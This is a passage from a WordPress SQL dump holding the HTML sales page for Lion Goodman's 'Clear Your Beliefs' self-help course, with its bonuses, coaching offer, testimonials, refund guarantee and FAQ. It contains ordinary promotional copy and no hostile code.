manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\r\n\r\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\r\n\r\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\r\n\r\nBe called to awaken your already-powerful ability to create the life of your dreams\r\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\r\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\r\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\r\nLearn a process that can strengthen your power of intention\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #5:<strong> Change Your Beliefs eBook</strong>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\r\n\r\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\r\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\r\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #6: <strong>Complete Transcripts of the Course</strong>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\r\n\r\n<p>&nbsp;</p>\r\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\r\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\r\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\r\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\r\n<h1 id="package"></h1>\r\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\r\n<p>&nbsp;</p>\r\n\r\n<h1>Purchase Today and You''ll Receive:</h1>\r\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\r\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\r\n<p>	<strong>=&gt; <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\r\n<strong>=&gt; <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\r\n<strong>=&gt; <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\r\n<strong>=&gt; <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\r\n<strong>=&gt; <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\r\n<strong>=&gt; <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\r\n<strong>=&gt; <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p>&nbsp;</p>\r\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\r\n<p style="text-align: center">OR</p>\r\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<h1>Satisfaction Guaranteed</h1>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\r\n<p>&nbsp;</p>\r\n<h1>About Lion Goodman</h1>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\r\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\r\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\r\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n\r\n<h1>Praise for Lion and Clear Your Beliefs</h1>\r\n\r\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\r\n<strong>– G. J., software developer</strong>\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\r\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\r\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\r\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\r\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\r\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\r\n<strong>~ T. L., Healer, Stamford, CT </strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\r\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\r\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\r\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\r\n<strong>~ C.T., Performance and Life Coach</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\r\n<strong>– M.M., International Business Consultant</strong>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p>&nbsp;</p>\r\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\r\n<p style="text-align: center">OR</p>\r\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Satisfaction Guaranteed</h1>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\r\n<p>&nbsp;</p>\r\n<h1>Frequently Asked Questions</h1>\r\n\r\n<p><strong>Q: What is a virtual course?</strong></p>\r\n\r\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\r\n\r\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\r\n\r\n<p><strong>Q: How long will I have access to the course?</strong></p>\r\n\r\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\r\n\r\n<p><strong>Q: Are there scholarships available?</strong></p>\r\n\r\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\r\n\r\n<p><strong>Q: What is your refund policy?</strong></p>\r\n\r\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\r\n\r\n<p><strong>Q: How can I reach Customer Support?</strong></p>\r\n\r\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\r\n\r\n<p><strong>Q: What is your Privacy Policy?</strong></p>\r\n\r\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\r\n\r\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\r\n\r\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\r\n\r\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-07-08 09:15:23', '2015-07-08 14:15:23', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2227, 2, '2015-07-08 09:30:29', '2015-07-08 14:30:29', '&nbsp;\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change 